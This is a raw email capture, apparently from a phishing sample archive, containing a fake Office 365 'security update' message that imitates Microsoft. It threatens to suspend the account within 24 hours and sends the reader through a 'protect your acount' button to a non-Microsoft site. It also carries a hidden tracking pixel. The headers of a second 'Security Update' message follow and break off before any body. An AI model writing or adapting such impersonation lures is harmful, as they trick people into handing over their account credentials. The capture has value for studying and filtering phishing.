From: microsoft.com
Date: Wed, 21 Aug 2019 08:50:00 +0000 (UTC)
Message-ID: <jAbZ7WuCTHujQKgw53kftg@ismtpd0015p1iad1.sendgrid.net>
X-SG-EID: uk4PP0eEjut4P8/eKt92EMT2PN5rig6Ts8EnoW54QtCMyIcAnUJYIUTWY4yug/4vM+I2j82P3ZV29z
 PMU5sACKuKqbYDI3rmvmmm/Anh6CuRLfhgwnHqwk1375pTUux2Ob3nchwEKTKO+dJoPjKCrUUkDueu
 8tV17yHUeQ17iXEdyVgHD/UvUJeacyVuXKmr
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 158

You will not see this in a MIME-aware mail reader.
--===============1870373103==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

=20
=20=20
=20
=20
=20

=20=20
=20=20=20=20
=20=20=20=09=20
=09=20
=20=20=20
=20=20=20=20
=20=20=20=20
=20=20=20=20
You have new Office 365 message concerning your security update.
 Your account has exceeded its limit and needs to be verified, if not verif=
ied within 24 hours, we shall suspend your account from receiving or sendin=
g emails. To make sure you are protected by the latest security updates.

 Click on the button bellow to update your account=20
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20=20=20=20=20=20=20=20=20=20=20=20
   protect your acount


=20=20=20
=20=20=20=20
    Office 365 Team=20=20=20
=A9 Microsoft 2019
=20=20
=20=20=20=20
=20=20=20
=20
=20=20=20



--===============1870373103==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><P><SPAN class=3D"gmail-ow-social-footer-headi=
ng gmail-x-weight-semibold" style=3D'FONT-SIZE: small; MARGIN-BOTTOM: 4px; =
FONT-FAMILY: "Segoe UI", SegoeUI, "Helvetica Neue", Helvetica, Arial, sans-=
serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-W=
EIGHT: 600; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; L=
ETTER-SPACING: normal; LINE-HEIGHT: 20px; PADDING-RIGHT: 20px; TEXT-INDENT:=
 0px; font-variant-ligatures: normal; font-variant-caps: normal; -webkit-te=
xt-stroke-width: 0px; text-decoration-style: initial; text-decoration-color=
: initial'><FONT size=3D1></FONT></SPAN>&nbsp;</P>
<UL style=3D'LIST-STYLE-TYPE: none; FONT-SIZE: small; MARGIN-BOTTOM: 4px; F=
ONT-FAMILY: "Segoe UI", SegoeUI, "Helvetica Neue", Helvetica, Arial, sans-s=
erif; WHITE-SPACE: normal; WORD-SPACING: 0px; MARGIN-TOP: 0px; TEXT-TRANSFO=
RM: none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); PADDING-BOTTOM: 0px; FONT-ST=
YLE: normal; PADDING-TOP: 0px; PADDING-LEFT: 0px; ORPHANS: 2; WIDOWS: 2; LE=
TTER-SPACING: normal; PADDING-RIGHT: 0px; TEXT-INDENT: 0px; font-variant-li=
gatures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px;=
 text-decoration-style: initial; text-decoration-color: initial'>
<LI style=3D"FLOAT: left"><A aria-label=3D"Follow Office on Linkedin" style=
=3D"BORDER-TOP: transparent 2px solid; HEIGHT: auto; BORDER-RIGHT: transpar=
ent 2px solid; WIDTH: auto; BORDER-BOTTOM: transparent 2px solid; COLOR: ; =
OUTLINE-WIDTH: 0px; OUTLINE-STYLE: none; BORDER-LEFT: transparent 2px solid=
; DISPLAY: inline-block; OUTLINE-COLOR: invert; BACKGROUND-COLOR: transpare=
nt; MARGIN-RIGHT: 10px; transition: scale 0.2s ease-in-out 0s; text-decorat=
ion-line: none" href=3D"https://go.microsoft.com/fwlink/p/?linkid=3D2002403=
" target=3D_blank><SPAN class=3Dgmail-ow-standard-contrast><FONT size=3D1><=
/FONT></SPAN></A></LI>
<LI style=3D"FLOAT: left"><A aria-label=3D"Follow Office on Facebook" style=
=3D"BORDER-TOP: transparent 2px solid; HEIGHT: auto; BORDER-RIGHT: transpar=
ent 2px solid; WIDTH: auto; BORDER-BOTTOM: transparent 2px solid; COLOR: ; =
OUTLINE-WIDTH: 0px; OUTLINE-STYLE: none; BORDER-LEFT: transparent 2px solid=
; DISPLAY: inline-block; OUTLINE-COLOR: invert; BACKGROUND-COLOR: transpare=
nt; MARGIN-RIGHT: 10px; transition: scale 0.2s ease-in-out 0s; text-decorat=
ion-line: none" href=3D"https://go.microsoft.com/fwlink/p/?LinkID=3D506743"=
 target=3D_blank><SPAN class=3Dgmail-ow-standard-contrast><FONT size=3D1></=
FONT></SPAN></A></LI>
<LI style=3D"FLOAT: left"></LI>
<LI style=3D"FLOAT: left"><SPAN class=3Dgmail-ow-standard-contrast><FONT si=
ze=3D1></FONT></SPAN></LI></UL>
<P>
<TABLE style=3D"FONT-SIZE: 16px; MAX-WIDTH: 512px; FONT-FAMILY: roboto, rob=
otodraft, helvetica, arial, sans-serif; WHITE-SPACE: normal; WORD-SPACING: =
0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT-STYLE:=
 normal; ORPHANS: 2; WIDOWS: 2; MARGIN: 0px auto; LETTER-SPACING: normal; B=
ACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatures=
: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-d=
ecoration-style: initial; text-decoration-color: initial" cellSpacing=3D0 c=
ellPadding=3D0 width=3D512 bgColor=3D#ffffff border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: roboto, robotodraft, helvetica, arial, sans-serif=
; BACKGROUND: rgb(243,243,243); BORDER-BOTTOM: rgb(236,236,236) 1px solid; =
PADDING-BOTTOM: 12px; PADDING-TOP: 12px; PADDING-LEFT: 12px; MARGIN: 0px; P=
ADDING-RIGHT: 12px" bgColor=3D#f3f3f3 width=3D"100%">
<TABLE style=3D"WIDTH: 487px; MIN-WIDTH: 100%" cellSpacing=3D0 cellPadding=
=3D0 width=3D"100%" border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: roboto, robotodraft, helvetica, arial, sans-serif=
; MARGIN: 0px" vAlign=3Dmiddle width=3D"50%" align=3Dleft><SPAN style=3D"FO=
NT-SIZE: 12px; COLOR: rgb(76,76,76); MARGIN: 0px; DISPLAY: inline-block; LI=
NE-HEIGHT: 20px"><IMG style=3D"MAX-WIDTH: 754px; WIDTH: 150px" src=3D"https=
://resize.yandex.net/mailservice?url=3Dhttps%3A%2F%2Fwww.projetlys.com%2Fwp=
-content%2Fuploads%2F2017%2F02%2FOfc365_rgb_Orng166.png&amp;proxy=3Dyes&amp=
;key=3D3aef06c55be7b3dbdd0dd9593046570d"></SPAN></TD>
<TD style=3D"FONT-FAMILY: roboto, robotodraft, helvetica, arial, sans-serif=
; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 10px; MARGIN: 0px; P=
ADDING-RIGHT: 0px" vAlign=3Dmiddle width=3D"50%" align=3Dright><BR></TD>
<TD style=3D"FONT-FAMILY: roboto, robotodraft, helvetica, arial, sans-serif=
; MARGIN: 0px" width=3D1></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: roboto, robotodraft, helvetica, arial, sans-serif=
; MARGIN: 0px" align=3Dleft>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: roboto, robotodraft, helvetica, arial, sans-serif=
; MARGIN: 0px" width=3D"100%">
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: roboto, robotodraft, helvetica, arial, sans-serif=
; PADDING-BOTTOM: 10px; PADDING-TOP: 20px; PADDING-LEFT: 0px; MARGIN: 0px; =
PADDING-RIGHT: 0px" align=3Dcenter>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-SIZE: 12px; FONT-FAMILY: roboto, robotodraft, helvetica, =
arial, sans-serif; PADDING-BOTTOM: 0px; TEXT-ALIGN: justify; PADDING-TOP: 0=
px; PADDING-LEFT: 15px; MARGIN: 0px; LINE-HEIGHT: 18px; PADDING-RIGHT: 15px=
; font-variant-numeric: normal; font-variant-east-asian: normal; font-stret=
ch: normal" width=3D"100%" align=3Dcenter>
<H3 class=3Dgmail-85196785e88556ef41d3565eead580cdgmail-ydp3209e86ctitle-co=
lor style=3D"FONT-SIZE: 16px; COLOR: rgb(235,104,31); PADDING-BOTTOM: 0px; =
TEXT-ALIGN: center; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; LINE-=
HEIGHT: 24px; PADDING-RIGHT: 0px">You have new Office 365 message concernin=
g your security update.</H3>
<P style=3D"FONT-SIZE: 15px; TEXT-ALIGN: left; MARGIN: 20px 0px 30px"><B st=
yle=3D"FONT-SIZE: 13px; FONT-FAMILY: verdana, geneva">Your&nbsp;account has=
 exceeded its limit and needs to be verified, if not verified within 24 hou=
rs, we shall suspend your account from receiving or sending emails. To make=
 sure you are protected by the latest security updates.</B><BR></P>
<P style=3D"FONT-SIZE: 15px; TEXT-ALIGN: left; MARGIN: 20px 0px 30px"><B st=
yle=3D"FONT-SIZE: 13px; FONT-FAMILY: verdana, geneva">Click on the button b=
ellow to update your account </B></P>
<P style=3D"FONT-SIZE: 15px; TEXT-ALIGN: left; MARGIN: 20px 0px 30px"><FONT=
 face=3DVerdana><STRONG>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; </STRONG>
<TABLE style=3D'FONT-SIZE: 16px; FONT-FAMILY: "helvetica neue", helvetica, =
arial, sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: =
none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; =
WIDOWS: 2; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT=
-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; -w=
ebkit-text-stroke-width: 0px; text-decoration-style: initial; text-decorati=
on-color: initial' align=3Dcenter>
<TBODY>
<TR>
<TD align=3Dcenter><SPAN style=3D'BACKGROUND: rgb(1,103,187); COLOR: rgb(25=
5,255,255); PADDING-BOTTOM: 5px; PADDING-TOP: 5px; FONT: 12px "trebuchet ms=
", arial, helvetica, sans-serif; PADDING-LEFT: 5px; PADDING-RIGHT: 5px; bor=
der-radius: 5px'><A href=3D"https://evolui.eco.br/office365/mail/x3342xsda/=
">protect your acount</A></SPAN></TD></TR></TBODY></TABLE></FONT></P></TD><=
/TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></T=
D></TR>
<TR>
<TD style=3D"FONT-FAMILY: roboto, robotodraft, helvetica, arial, sans-serif=
; MARGIN: 0px" align=3Dleft>
<TABLE style=3D"COLOR: rgb(153,153,153); PADDING-BOTTOM: 0px; PADDING-TOP: =
0px; PADDING-LEFT: 24px; PADDING-RIGHT: 24px" cellSpacing=3D0 cellPadding=
=3D0 width=3D"100%" bgColor=3D#ffffff border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: roboto, robotodraft, helvetica, arial, sans-serif=
; MARGIN: 0px" width=3D"100%" align=3Dcenter>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0>
<TBODY>
<TR>
<TD style=3D"BORDER-TOP: rgb(217,217,217) 1px solid; FONT-FAMILY: roboto, r=
obotodraft, helvetica, arial, sans-serif; PADDING-BOTTOM: 20px; TEXT-ALIGN:=
 center; PADDING-TOP: 12px; PADDING-LEFT: 0px; MARGIN: 0px; LINE-HEIGHT: 18=
px; PADDING-RIGHT: 0px; font-variant-numeric: normal; font-variant-east-asi=
an: normal; font-stretch: normal" vAlign=3Dmiddle width=3D"100%" align=3Dce=
nter>
<DIV style=3D"TEXT-ALIGN: left"><SPAN style=3D"FONT-SIZE: x-small; FONT-FAM=
ILY: tahoma; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; =
FLOAT: none; FONT-WEIGHT: 700; COLOR: rgb(76,76,76); FONT-STYLE: normal; TE=
XT-ALIGN: left; ORPHANS: 2; WIDOWS: 2; DISPLAY: inline !important; LETTER-S=
PACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-=
variant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-w=
idth: 0px; text-decoration-style: initial; text-decoration-color: initial">=
Office 365 Team</SPAN></DIV>
<DIV style=3D"TEXT-ALIGN: left"><SPAN style=3D"FONT-SIZE: x-small; FONT-FAM=
ILY: tahoma; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; =
FLOAT: none; FONT-WEIGHT: 700; COLOR: rgb(76,76,76); FONT-STYLE: normal; TE=
XT-ALIGN: left; ORPHANS: 2; WIDOWS: 2; DISPLAY: inline !important; LETTER-S=
PACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-=
variant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-w=
idth: 0px; text-decoration-style: initial; text-decoration-color: initial">
<UL class=3D"e7e36217a2965ff2608cb8b554220cf1c-list 506a3cae414c4b4ae6cd3e0=
5145902f6f-bare" style=3D'LIST-STYLE-TYPE: none; BACKGROUND: rgb(242,242,24=
2); WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; COLOR: rg=
b(97,97,97); PADDING-BOTTOM: 0px; TEXT-ALIGN: left; PADDING-TOP: 0px; FONT:=
 400 11px/16px "segoe ui", segoeui, "helvetica neue", helvetica, arial, san=
s-serif; PADDING-LEFT: 0px; ORPHANS: 2; WIDOWS: 2; MARGIN: 3px 0px; LETTER-=
SPACING: normal; PADDING-RIGHT: 0px; TEXT-INDENT: 0px; -webkit-text-stroke-=
width: 0px; text-decoration-style: initial; text-decoration-color: initial'>
<LI style=3D"PADDING-BOTTOM: 4px; PADDING-TOP: 0px; PADDING-LEFT: 0px; DISP=
LAY: inline-block; PADDING-RIGHT: 24px">=A9 Microsoft 2019</LI></UL></SPAN>=
</DIV>
<DIV style=3D"TEXT-ALIGN: left">
<TABLE style=3D"MAX-WIDTH: 512px; COLOR: rgb(0,0,0); MARGIN: 0px auto" cell=
Spacing=3D0 cellPadding=3D0 width=3D512 bgColor=3D#ffffff border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: roboto, robotodraft, helvetica, arial, sans-serif=
; MARGIN: 0px" align=3Dleft>
<TABLE style=3D"COLOR: rgb(153,153,153); PADDING-BOTTOM: 0px; PADDING-TOP: =
0px; PADDING-LEFT: 24px; PADDING-RIGHT: 24px" cellSpacing=3D0 cellPadding=
=3D0 width=3D"100%" bgColor=3D#ffffff border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: roboto, robotodraft, helvetica, arial, sans-serif=
; MARGIN: 0px" width=3D"100%" align=3Dcenter></TD></TR></TBODY></TABLE></TD=
></TR></TBODY></TABLE></DIV></TD></TR></TBODY></TABLE></TD></TR></TBODY></T=
ABLE></TD></TR></TBODY></TABLE>
<TABLE style=3D"FONT-SIZE: 16px; FONT-FAMILY: Helvetica, Arial, sans-serif;=
 WHITE-SPACE: normal; WORD-SPACING: 0px; TABLE-LAYOUT: fixed; TEXT-TRANSFOR=
M: none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: =
2; WIDOWS: 2; LETTER-SPACING: normal; TEXT-INDENT: 0px; font-variant-ligatu=
res: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; tex=
t-decoration-style: initial; text-decoration-color: initial" cellSpacing=3D=
0 cellPadding=3D0 width=3D"100%" align=3Dcenter border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
; MARGIN: 0px" align=3Dcenter><BR class=3DApple-interchange-newline></TR></=
TBODY></P>
<img src=3D"https://u1555193.ct.sendgrid.net/wf/open?upn=3DpefIbq-2F0PhcN2q=
ttzAUOKcqrOrDw1L6ncHuzcceg2g-2FuxvP-2FRLm4BE-2Fsvzjd2rNd-2FBV3qBcCit05v8GES=
FBTVgEmwBxqhzQxvwuBi38a8dqn4GZXfL2AaEqnlZx3Nhadk3nb-2FMmboX9vpzj7iRtyG0M6vy=
rkmqcvmOS7wdW5JP4yD-2FAtiUL5GlFNBmdSU-2FJCUz-2FengrGWJNtla6o5y3Q6aXb8J-2FGp=
ISVc0VzjxdYVZU-3D" alt=3D"" width=3D"1" height=3D"1" border=3D"0" style=3D"=
height:1px !important;width:1px !important;border-width:0 !important;margin=
-top:0 !important;margin-bottom:0 !important;margin-right:0 !important;marg=
in-left:0 !important;padding-top:0 !important;padding-bottom:0 !important;p=
adding-right:0 !important;padding-left:0 !important;"/>
</BODY></HTML>

--===============1870373103==--

From jose@monkey.org Wed Aug 21 12:40:23 2019 +0000
Return-Path: bounces+1555193-a54c-jose=monkey.org@email.babytobody.co.uk
Delivered-To: jose@monkey.org
X-FDA: 75846393126.10.name63_206796a510223
X-Spam-Summary: 50,0,0,2a7878664570bca1,d41d8cd98f00b204,bounces+1555193-a54c-jose=monkey.org@email.babytobody.co.uk,,RULES_HIT:1:2:41:72:355:455:490:962:967:973:978:983:988:989:1189:1208:1221:1260:1313:1314:1345:1381:1431:1432:1433:1434:1436:1437:1516:1517:1518:1567:1571:1575:1588:1589:1592:1594:1710:1714:1730:1777:1792:1801:1803:2194:2198:2199:2200:2525:2527:2560:2565:2610:2682:2685:2741:2859:2890:2894:2895:2896:2897:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3865:3867:3868:3873:3889:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4050:4180:4321:4605:5007:6650:6653:6678:6687:7652:7688:7903:8583:8603:8957:9010:9025:9080:9121:9416:9908:10004:10214:10249:10305:10346:11233:11473:11657:11658:11914:12043:12050:12051:12297:12438:12555:12561:12740:12895:12903:12986:13139:13235:13236:13237:13241:13439:14096:14141:14196:14246:14404:14405:21347:21433:21450:21451:21483:21524:21611:21627:21819:21838:21939:30001:30026:30054:30070,0,RBL:error,
X-HE-Tag: name63_206796a510223
X-Filterd-Recvd-Size: 10698
Received: from o1.email.babytobody.co.uk (o1.email.babytobody.co.uk [167.89.23.220])
	by imf30.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 21 Aug 2019 12:40:22 +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; 
	d=babytobody.co.uk; h=content-type:mime-version:subject:to:from; 
	s=s1; bh=YSA/B2wHi89iZ5wHTTpxBpJ49Ow=; b=H1O2hxqVyckiVxdYaEvQg3c
	9TlLkLu+hfddij4N26bGWl6OYtShGPLHAriFKXnd3ljnOMYBAb8leSJbFo0vlnUk
	lEX8V6BZeMVHeGclB0gJYvSDFKCuq7W5p9B/Vckr/CzpjZtu7kwZ8NNZaRdK14AM
	rCZsjnn1d8tAOOSmI9ZE=
Received: by filter1655p1mdw1.sendgrid.net with SMTP id filter1655p1mdw1-25246-5D5D3BAF-15
        2019-08-21 12:40:15.565911931 +0000 UTC m=+54752.241094471
Received: from [23.249.162.95] (bestrew.caresample.com [23.249.162.95])
	by ismtpd0010p1iad1.sendgrid.net (SG) with ESMTP id 0W_RR6nVQeKQ8asIH7vC2Q
	Wed, 21 Aug 2019 12:40:15.485 +0000 (UTC)
Content-Type: multipart/alternative; boundary="===============0484956977=="
MIME-Version: 1.0
Subject: Security Update
To: Recipients <live.office365.com>
